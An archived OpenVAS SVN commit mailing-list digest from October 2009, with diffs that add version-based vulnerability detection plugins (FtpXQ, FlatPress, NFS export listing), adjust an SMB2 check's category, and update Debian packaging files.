scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 15:28:39 +0200 (CEST) Subject: [Openvas-commits] r5405 - trunk/openvas-packaging/openvas-scanner/debian/trunk/debian Message-ID: <20091006132839.4E2C585D9F72@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 15:28:38 +0200 (Tue, 06 Oct 2009) New Revision: 5405 Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog Log: Corrected email address. Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog 2009-10-06 11:57:00 UTC (rev 5404) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog 2009-10-06 13:28:38 UTC (rev 5405) @@ -5,7 +5,7 @@ * openvas-scanner.init: Removed superfluous "-D" (now obsolete since becoming a daemon is the default behaviour). - -- Michael Wiegand Tue, 06 Oct 2009 13:53:08 +0200 + -- Michael Wiegand Tue, 06 Oct 2009 13:53:08 +0200 openvas-scanner (3.0.0.beta2-2) UNRELEASED; urgency=low From scm-commit at wald.intevation.org Tue Oct 6 17:09:40 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 17:09:40 +0200 (CEST) Subject: [Openvas-commits] r5406 - in trunk/openvas-client: . openvas/prefs_dialog Message-ID: <20091006150940.1E49A852FE2A@pyrosoma.intevation.org> Author: jan Date: 2009-10-06 17:09:37 +0200 (Tue, 06 Oct 2009) New Revision: 5406 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c Log: * openvas/prefs_dialog/prefs_scope_tree.c (scope_menu_save): Renamed default filename from nessusrc to openvasrc. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-06 13:28:38 UTC (rev 5405) +++ trunk/openvas-client/ChangeLog 2009-10-06 15:09:37 UTC (rev 5406) @@ -1,3 +1,8 @@ +2009-10-06 Jan-Oliver Wagner + + * openvas/prefs_dialog/prefs_scope_tree.c (scope_menu_save): Renamed + default filename from nessusrc to openvasrc. + 2009-10-06 Matthew Mundell * openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): Symlink Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-06 13:28:38 UTC (rev 5405) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-06 15:09:37 UTC (rev 5406) @@ -842,7 +842,7 @@ if(parent) gtk_window_set_transient_for(GTK_WINDOW(dialog), parent); prefs_context_update(context_by_type(Context, CONTEXT_SCOPE)); - gtk_file_selection_set_filename(GTK_FILE_SELECTION(dialog), "nessusrc"); + gtk_file_selection_set_filename(GTK_FILE_SELECTION(dialog), "openvasrc"); g_signal_connect(GTK_FILE_SELECTION(dialog)->ok_button, "clicked", G_CALLBACK(scope_menu_save_ok), dialog); g_signal_connect_swapped(GTK_FILE_SELECTION(dialog)->cancel_button, From scm-commit at wald.intevation.org Tue Oct 6 18:45:46 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 18:45:46 +0200 (CEST) Subject: [Openvas-commits] r5407 - in trunk/openvas-plugins: . scripts Message-ID: <20091006164546.27471861EAB2@pyrosoma.intevation.org> Author: mime Date: 2009-10-06 18:45:43 +0200 (Tue, 06 Oct 2009) New Revision: 5407 Added: trunk/openvas-plugins/scripts/FtpXQ_36391.nasl trunk/openvas-plugins/scripts/flatpress_36543.nasl trunk/openvas-plugins/scripts/flatpress_detect.nasl trunk/openvas-plugins/scripts/showmount.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt trunk/openvas-plugins/scripts/ms_smb2_highid.nasl Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-06 15:09:37 UTC (rev 5406) +++ trunk/openvas-plugins/ChangeLog 2009-10-06 16:45:43 UTC (rev 5407) @@ -1,3 +1,17 @@ +2009-10-06 Michael Meyer + + * scripts/flatpress_36543.nasl, + scripts/FtpXQ_36391.nasl, + scripts/flatpress_detect.nasl: + Added new plugins. + + * scripts/ms_smb2_highid.nasl: + Changed script_category to ACT_KILL_HOST. Removed unneeded + dependencies. + + * scripts/showmount.nasl: + Added plugin developed by LSS Security Team. + 2009-10-06 Chandrashekhar B * scripts/wmi_rsop.inc: Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-10-06 15:09:37 UTC (rev 5406) +++ trunk/openvas-plugins/cve_current.txt 2009-10-06 16:45:43 UTC (rev 5407) @@ -109,5 +109,6 @@ CVE-2009-3510 SecPod CVE-2009-3541 SecPod CVE-2009-3484 SecPod +36543 Greenbone svn R +36391 Greenbone svn R - Added: trunk/openvas-plugins/scripts/FtpXQ_36391.nasl =================================================================== --- trunk/openvas-plugins/scripts/FtpXQ_36391.nasl 2009-10-06 15:09:37 UTC (rev 5406) +++ trunk/openvas-plugins/scripts/FtpXQ_36391.nasl 2009-10-06 16:45:43 UTC (rev 5407) @@ -0,0 +1,88 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# DataWizard FtpXQ Remote Denial of Service Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100293); + script_bugtraq_id(36391); + script_version ("1.0-$Revision$"); + + script_name("DataWizard FtpXQ Remote Denial of Service Vulnerability"); + +desc = "Overview: +FtpXQ is prone to a remote denial-of-service vulnerability. + +Remote attackers can cause the affected server to stop responding, +denying service to legitimate users. + +FtpXQ 3.0 is vulnerable; other versions may also be affected. + +References: +http://www.securityfocus.com/bid/36391 +http://www.datawizard.net + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if FtpXQ version is 3.0"); + script_category(ACT_GATHER_INFO); + script_family("FTP"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl"); + script_require_ports("Services/ftp", 21); + exit(0); +} + +include("ftp_func.inc"); +include("version_func.inc"); + +port = get_kb_item("Services/ftp"); +if(!port){ + port = 21; +} + +if(get_kb_item('ftp/'+port+'/broken'))exit(0); + +if(!get_port_state(port)){ + exit(0); +} + +if(!banner = get_ftp_banner(port:port))exit(0); + +if("FtpXQ" >!< banner)exit(0); + +version = eregmatch(string: banner, pattern:"Version ([0-9.]+)"); + +if(!isnull(version[1])) { + if(version_is_equal(version: version[1], test_version: "3.0")) { + security_warning(port:port); + } +} + + +exit(0); + + Property changes on: trunk/openvas-plugins/scripts/FtpXQ_36391.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/flatpress_36543.nasl =================================================================== --- trunk/openvas-plugins/scripts/flatpress_36543.nasl 2009-10-06 15:09:37 UTC (rev 5406) +++ trunk/openvas-plugins/scripts/flatpress_36543.nasl 2009-10-06 16:45:43 UTC (rev 5407) @@ -0,0 +1,92 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# FlatPress 'userid' Parameter Local File Include Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100295); + script_bugtraq_id(36543); + script_version ("1.0-$Revision$"); + + script_name("FlatPress 'userid' Parameter Local File Include Vulnerability"); + +desc = "Overview: +FlatPress is prone to a local file-include vulnerability because it +fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to obtain potentially +sensitive information and execute arbitrary local scripts in the +context of the webserver process. This may allow the attacker to +compromise the application and the underlying computer; other attacks +are also possible. + +FlatPress 0.804 through 0.812.1 are vulnerable. + +Solution: +The vendor has released an update. Please see the references +for details. + +References: +http://www.securityfocus.com/bid/36543 +https://sourceforge.net/project/shownotes.php?group_id=157089&release_id=628765 +http://www.securityfocus.com/archive/1/506816 + + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if FlatPress is prone to a local file-include vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("flatpress_detect.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + +include("http_func.inc"); +include("http_keepalive.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if(!can_host_php(port:port)) exit(0); + +if(!version = get_kb_item(string("www/", port, "/flatpress")))exit(0); +if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0); + +vers = matches[1]; +if(!isnull(vers) && vers >!< "unknown") { + + if(version_in_range(version: vers, test_version: "0.804", test_version2: "0.812.1")) { + security_warning(port:port); + exit(0); + } + +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/flatpress_36543.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/flatpress_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/flatpress_detect.nasl 2009-10-06 15:09:37 UTC (rev 5406) +++ trunk/openvas-plugins/scripts/flatpress_detect.nasl 2009-10-06 16:45:43 UTC (rev 5407) @@ -0,0 +1,110 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Flatpress Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +# need desc here to modify it later in script. +desc = "Overview: +This host is running Flatpress, an open-source blogging engine. + +See also: +http://www.flatpress.org + +Risk factor : None"; + +if (description) +{ + script_id(100294); + script_version ("1.0-$Revision$"); + + script_name("Flatpress Detection"); + script_description(desc); + script_summary("Checks for the presence of Flatpress"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes", "http_version.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + + +include("http_func.inc"); +include("http_keepalive.inc"); +include("global_settings.inc"); + +port = get_http_port(default:80); + +if(!get_port_state(port))exit(0); +if(!can_host_php(port:port))exit(0); + +dirs = make_list("/flatpress","/blog",cgi_dirs()); + +foreach dir (dirs) { + + url = string(dir, "/index.php"); + req = http_get(item:url, port:port); + buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE); + if( buf == NULL )continue; + + if(egrep(pattern: "powered by ]>FlatPress", string: buf, icase: TRUE) || + egrep(pattern: 'meta name="generator" content="FlatPress', string: buf, icase: TRUE)) + { + if(strlen(dir)>0) { + install=dir; + } else { + install=string("/"); + } + + vers = string("unknown"); + ### try to get version + version = eregmatch(string: buf, pattern: 'FlatPress fp-([0-9.]+[^"]*)',icase:TRUE); + + if ( !isnull(version[1]) ) { + vers=chomp(version[1]); + } + + set_kb_item(name: string("www/", port, "/flatpress"), value: string(vers," under ",install)); + + info = string("None\n\nFlatPress Version '"); + info += string(vers); + info += string("' was detected on the remote host in the following directory(s):\n\n"); + info += string(install, "\n"); + + desc = ereg_replace( + string:desc, + pattern:"None$", + replace:info + ); + + if(report_verbosity > 0) { + security_note(port:port,data:desc); + } + exit(0); + + } +} +exit(0); + Property changes on: trunk/openvas-plugins/scripts/flatpress_detect.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/ms_smb2_highid.nasl =================================================================== --- trunk/openvas-plugins/scripts/ms_smb2_highid.nasl 2009-10-06 15:09:37 UTC (rev 5406) +++ trunk/openvas-plugins/scripts/ms_smb2_highid.nasl 2009-10-06 16:45:43 UTC (rev 5407) @@ -72,16 +72,15 @@ script_description(desc); script_summary("Determine if Microsoft Windows is prone to a remote code-execution vulnerability"); - script_category(ACT_GATHER_INFO); + script_category(ACT_KILL_HOST); script_family("Windows"); script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); - script_dependencies("find_service.nes", "smtpserver_detect.nasl"); + script_dependencies("find_service.nes"); script_require_ports(445); exit(0); } include("misc_func.inc"); -include("network_func.inc"); if(safe_checks())exit(0); Added: trunk/openvas-plugins/scripts/showmount.nasl =================================================================== --- trunk/openvas-plugins/scripts/showmount.nasl 2009-10-06 15:09:37 UTC (rev 5406) +++ trunk/openvas-plugins/scripts/showmount.nasl 2009-10-06 16:45:43 UTC (rev 5407) @@ -0,0 +1,217 @@ +################################################################### +# OpenVAS Network Vulnerability Test +# $Id$ +# +# Showmount +# +# LSS-NVT-2009-014 +# +# Developed by LSS Security Team +# +# Copyright (C) 2009 LSS +# +# This program is free software: you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation, either version 2 of +# the License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public +# License along with this program. If not, see +# . +################################################################### +if(description) +{ + script_id(102014); + script_version ("1.0-$Revision$"); + script_cve_id("CVE-1999-0554", "CVE-1999-0548"); + script_name("NFS export"); + + desc = " +This plugin lists NFS exported shares, and warns if some of +them are readable. + +It also warns if the remote NFS server is superfluous. + +Tested on Ubuntu/Debian mountd + +References: + rfc 1057 + rfc 1094 + +Thanks to Wireshark! + +Risk factor : Low / Medium"; + + script_description(desc); + script_summary("Checks for NFS shares"); + script_category(ACT_GATHER_INFO); + script_family("Remote file access"); + script_dependencie("secpod_rpc_portmap.nasl"); + script_require_keys("rpc/portmap"); + exit(0); +} + +include("misc_func.inc"); +include("nfs_func.inc"); + +#mountd program number and version + +RPC_MOUNTD = 100005; +RPC_MOUNTD_VERSION = 1; +RPC_NFSD = 100003; +####RPC MOUNT EXPORT function#### +# PURPOSE: obtains the targets export list by sending an RPC CALL message to EXPORT procedure of mountd +# ARGUMENT: -port- on which the mountd daemon is listening +# -protocol- IPPROTO_UDP(default) or IPPROTO_TCP +# RETURN: returns the NFSd daemons export list as defined in rfc 1094 (Appendix A) +# null on error + + +function rpc_mountd_export(port,protocol){ + + XID = raw_string(0x01,0x23,0x45,0x67);#rpc message ID, should be the same as reply xid + RPC_CALL = raw_string(0x00,0x00,0x00,0x00);#call message = 0 + RPC_VERSION = raw_string(0x00,0x00,0x00,0x02);#current RPC version = 2 + RPC_PROG = raw_string(0x00,0x01,0x86,0xa5);#mountd program number = 100005 + RPC_PROG_VERSION = raw_string(0x00,0x00,0x00,0x01);#mountd program version = 1 + RPC_PROCEDURE = raw_string(0x00,0x00,0x00,0x05);#mountd export procedure number = 5 + RPC_CREDENTIALS_FLAVOR = raw_string(0x00,0x00,0x00,0x00);#credentials flavor = AUTH_NULL = 0 + RPC_CREDENTIALS_LENGTH = raw_string(0x00,0x00,0x00,0x00);#credentials length = 0 + RPC_VERIFIER_FLAVOR = raw_string(0x00,0x00,0x00,0x00);#verifier flavor = AUTH_NULL = 0 + RPC_VERIFIER_LENGTH = raw_string(0x00,0x00,0x00,0x00);#verifier length = 0 + + rpc_mountd_export_call = XID + + RPC_CALL + + RPC_VERSION + + RPC_PROG + + RPC_PROG_VERSION + + RPC_PROCEDURE + + RPC_CREDENTIALS_FLAVOR + + RPC_CREDENTIALS_LENGTH + + RPC_VERIFIER_FLAVOR + + RPC_VERIFIER_LENGTH; + if(isnull(protocol)){ + protocol = IPPROTO_UDP; + } + MSS = 1460; #data len to read at most (maximum segment size for ethernet) + rpc_mountd_export_reply = NULL; + if(protocol == IPPROTO_UDP){ + udp_sock = open_sock_udp(port); + if(isnull(udp_sock)) { + log_message("rpc_mountd_export: Error opening socket on udp port " + port); + return NULL; + } + send(socket: udp_sock, data: rpc_mountd_export_call); + rpc_mountd_export_reply = recv(socket: udp_sock, length: MSS); + close(udp_sock); + }else if(protocol == IPPROTO_TCP){ + tcp_sock = open_sock_tcp(port); + if(isnull(tcp_sock)){ + log_message("rpc_mountd_export: Error opening socket on tcp port " + port); + return NULL; + } + send(socket: tcp_sock, data: rpc_mountd_export_call); + rpc_mountd_export_reply = recv(socket: tcp_sock, length: MSS); + close(tcp_sock); + }else { + log_message("rpc_mountd_export: Invalid protocol"); + return NULL; + } + + if(isnull(rpc_mountd_export_reply)){ + log_message("rpc_mountd_export: No reply message"); + return NULL; + } + + #RPC reply + reply_xid = substr(rpc_mountd_export_reply,0,3); + if(reply_xid != XID){ + log_message("rpc_mountd_export: xid don't match"); + return NULL; + } + reply_msg_type = substr(rpc_mountd_export_reply,4,7); + if(reply_msg_type != raw_string(0x00, 0x00, 0x00, 0x01)){ + log_message("rpc_mountd_export: Not a reply message"); + return NULL; + } + reply_reply_state = substr(rpc_mountd_export_reply,8,11); + if(reply_reply_state != raw_string(0x00, 0x00, 0x00, 0x00)){ + log_message("rpc_mountd_export: Call was denied by the server"); + return NULL; + } + reply_verifier_flavor = substr(rpc_mountd_export_reply,12,15); + reply_verifier_length = substr(rpc_mountd_export_reply,16,19); + reply_accept_state = substr(rpc_mountd_export_reply,20,23); + if(reply_accept_state != raw_string(0x00, 0x00, 0x00, 0x00)){ + log_message("rpc_mountd_export: Remote procedure returned an error"); + return NULL; + } + #MOUNTD exportlist + reply_mountd_exportlist = substr(rpc_mountd_export_reply,24); + return reply_mountd_exportlist; +} + +####MAIN#### + +RPC_MOUNTD_port = get_rpc_port(program: RPC_MOUNTD, protocol: IPPROTO_UDP); +RPC_NFSD_port = get_rpc_port(program: RPC_NFSD, protocol: IPPROTO_UDP); + +#display("NFSD: " + RPC_NFSD_port + '\n'); +#display("MOUNTD port: " + RPC_MOUNTD_port + '\n'); + +export_list = rpc_mountd_export(port: RPC_MOUNTD_port, protocol: IPPROTO_UDP); #using UDP because get_rpc_port is written only for udp ports +if(isnull(export_list)){ + log_message("rpc_mountd_export: FAIL!"); + exit(-1); +}else{ + VALUE_FOLLOWS = raw_string(0x00, 0x00, 0x00, 0x01); + LEFT = 0; RIGHT = 3; + export_value_follows = substr(export_list, LEFT, RIGHT); + while(export_value_follows == VALUE_FOLLOWS){ + LEFT = RIGHT + 1; + RIGHT = LEFT + 3; + export_dirpath_length = str2long(val: substr(export_list, LEFT,RIGHT), idx: 0); + LEFT = RIGHT + 1; + RIGHT = LEFT + export_dirpath_length - 1; + export_dirpath = substr(export_list, LEFT, RIGHT); + LEFT = RIGHT + padsz(len: export_dirpath_length) + 1; + RIGHT = LEFT + 3; + groups_value_follows = substr(export_list, LEFT, RIGHT); + groups = ""; + while(groups_value_follows == VALUE_FOLLOWS){ + LEFT = RIGHT + 1; + RIGHT = LEFT + 3; + groups_length = str2long(val: substr(export_list, LEFT,RIGHT), idx: 0); + LEFT = RIGHT + 1; + RIGHT = LEFT + groups_length - 1; + groups = groups + substr(export_list, LEFT, RIGHT); + LEFT = RIGHT + padsz(len: groups_length) + 1; + RIGHT = LEFT + 3; + groups_value_follows = substr(export_list, LEFT, RIGHT); + } + LEFT = RIGHT + 1; + RIGHT = LEFT + 3; + export_value_follows = substr(export_list, LEFT,RIGHT); + insstr(groups, '\0', strlen(groups) - 1); + list += export_dirpath + ' ' + groups + '\n'; + set_kb_item(name:"nfs/exportlist", value:export_dirpath); + } +} + +proto = "udp"; +if(isnull(list)){ + report = 'You are running a superfluous NFS daemon.\nYou should consider removing it\n'; + security_note(port:RPC_NFSD_port, data:report, proto:proto); + #display(report); + exit(0); +}else{ + report = 'Here is the export list of ' + get_host_name() + ' : \n' + list; + security_note(port:RPC_NFSD_port, data:report, proto:proto); + #display(report); + exit(0); +} Property changes on: trunk/openvas-plugins/scripts/showmount.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision From scm-commit at wald.intevation.org Wed Oct 7 00:38:58 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:38:58 +0200 (CEST) Subject: [Openvas-commits] r5408 - in trunk/openvas-packaging/openvas-plugins/debian/trunk/debian: . audit patches po Message-ID: <20091006223858.D0A99861EAAA@pyrosoma.intevation.org> Author: jfs Date: 2009-10-07 00:38:55 +0200 (Wed, 07 Oct 2009) New Revision: 5408 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/TODO trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/audit/ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/audit/COPY-OPENVAS trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/audit/RESTORED trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/POTFILES.in trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ca.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/cs.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/da.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/de.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/es.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/fr.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ja.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/nl.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/pt.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/pt_BR.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/sv.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/templates.pot trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/vi.po Removed: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README.source trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/10_fix_install_permissions.dpatch Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules Log: Debian packaging for the 1.0.2-1 of the openvas-plugins package (not distributed by Debian) Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README.source =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README.source 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README.source 2009-10-06 22:38:55 UTC (rev 5408) @@ -1,7 +0,0 @@ -The new orig tarball can be created by removing the following directories: - -rm -rf audit/ docs/ extra/ packaging/ scripts/ template.nasl - -For the rest we use dpatch for patch handling inside our package(s). Please -see /usr/share/doc/dpatch/README.source.gz (if you have installed dpatch) for -documentation about dpatch. Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/TODO =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/TODO 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/TODO 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,5 @@ + +- Update the debconf questions, they still talk about Nessus + --> update also the translations + +- See if the debconf questions are still relevant for OpenVAS Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/audit/COPY-OPENVAS =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/audit/COPY-OPENVAS 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/audit/COPY-OPENVAS 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,268 @@ +# Scripts copied from OpenVAS sources +# +4d_webstar_remote_buff_overflow.nasl +4d_webstar_symb_link.nasl +4images_171_directory_traversal.nasl +Accelar_1200.nasl +account_bash.nasl +account_debug_synnet.nasl +account_help.nasl +account_public_public.nasl +account_super_debug.nasl +account_super_forgot.nasl +account_user_debug.nasl +account_user_forgot.nasl +advanced_guestbook.nasl +aenovo_db_disclosure.nasl +Allied_Telesyn_telnet.nasl +Allied_Telesyn_web.nasl +anaconda_doublenull.nasl +apache_htpasswd_overflow.nasl +apache_input_header_folding_dos.nasl +apache_mod_include_priv_escalation.nasl +apache_mod_proxy_buff_overflow.nasl +apache_SSL_complain.nasl +argosoft_multiple_flaws2.nasl +articlelive_xss.nasl +aspdev_imgtag.nasl +asp_inline_sql_injection.nasl +aspjar_sql_injection.nasl +athena_web_remote_cmd_exec.nasl +atutor_multiple_flaws.nasl +avaya_switches.nasl +aventail_asap.nasl +awstats_configdir.nasl +aztek_xss.nasl +b2evolution_net_sql_injection.nasl +backoffice_lite_bypass.nasl +bblog_sql_inject.nasl +bofra_detect.nasl +bookreview_xss.nasl +breakcal_xss.nasl +brio_dir_traversal.nasl +bugport_attachment_handling_flaw.nasl +bugzilla_remote_exec.nasl +calendar_express_flaws.nasl +calendarix_sql.nasl +calendar_scheduler_xss.nasl +CA_License_Service_Stack_Overflow.nasl +cern_httpd_access_ctrl.nasl +cern_httpd_cginame_overflow.nasl +cgi_rb.nasl +check_dns_tcp.nasl +checkpoint_secureplatform.nasl +check_smtp_helo.nasl +cheopsNG_detect.nasl +CiscoVG248.nasl +citrix_xss.nasl +citrusdb_cc_disclosure.nasl +cjoverkill_xss.nasl +clearswift_mimesweeper_smtp_detect.nasl +codethatshoppingcart_sql.nasl +community_link_pro_login_remote_cmd_exec.nasl +consolehelp.nasl +cubecart_lang_xss.nasl +cups_empty_udp_dos.nasl +cups_multiple_vulnerabilities.nasl +cutenews_dir_traversal.nasl +cutenews_indexphp_xss.nasl +cutenews_xss.nasl +cvstrac_account_deletion.nasl +cyberstrong_eshop_sql.nasl +dada_mail_xss.nasl +deluxeBB_sql_injection.nasl +desknow_multiple_vuln.nasl +digital_scribe_login_sql_inject.nasl +discuz_arbitrary_file_upload_flaw.nasl +dotnetnuke_xss.nasl +dream4_koobi_cms_sql.nasl +e107_sql_injection.nasl +easy_message_board_cmd_exec.nasl +egd_detect.nasl +episodex_guestbook.nasl +famd_detect.nasl +find_service1.nasl +fishcart_sql_injection.nasl +ftp_kibuv_worm.nasl +fusion_sbx_bypass.nasl +goollery_xss.nasl +gosmart_message_board.nasl +greymatter_html_inject.nasl +guppy_request_header_flaws.nasl +hcl_file_include.nasl +horde_3_0_xss.nasl +horde_detect.nasl +horde_help_xss.nasl +hp_data_protector_installed.nasl +htdig_xss.nasl +http_header_name_format_string.nasl +http_header_value_format_string.nasl +http_url_format_string.nasl +iax2_detection.nasl +ibproarcade_sql_injection.nasl +ident_backdoor2.nasl +ilo_detect.nasl +ilohamail_conf_files_readable.nasl +i-mall_cgi.nasl +imap_unencrypted_cleartext_logins.nasl +imp_status_xss.nasl +imss_detect.nasl +includer_rcmdexec.nasl +inserter_file_inclusion.nasl +interspect_detect.nasl +intrushield_console_detect.nasl +invision_pwb.nasl +iss_deploymanager.nasl +iwss_detect.nasl +jaws_file_inclusion.nasl +jgsportal_sql.nasl +kayako_sql_injection.nasl +kerio_wrf_management_detection.nasl +last10_sql_injection.nasl +ldapsearch.nasl +ldu_detection.nasl +limbo_multiple_flaws.nasl +linksys_multiple_vulns.nasl +lotus_domino_xss.nasl +mailgust_sql_injection.nasl +mailman_detect.nasl +mambo_flaws.nasl +mambo_xss3.nasl +mantis_file_incl_sql_inject.nasl +mantis_multiple_vulns4.nasl +mercuryboard_multiple_vuln.nasl +metacart_sql.nasl +minishare_overflow.nasl +mod_ssl_hook_functions_format_string_vuln.nasl +moodle_php_reply_variable_xss.nasl 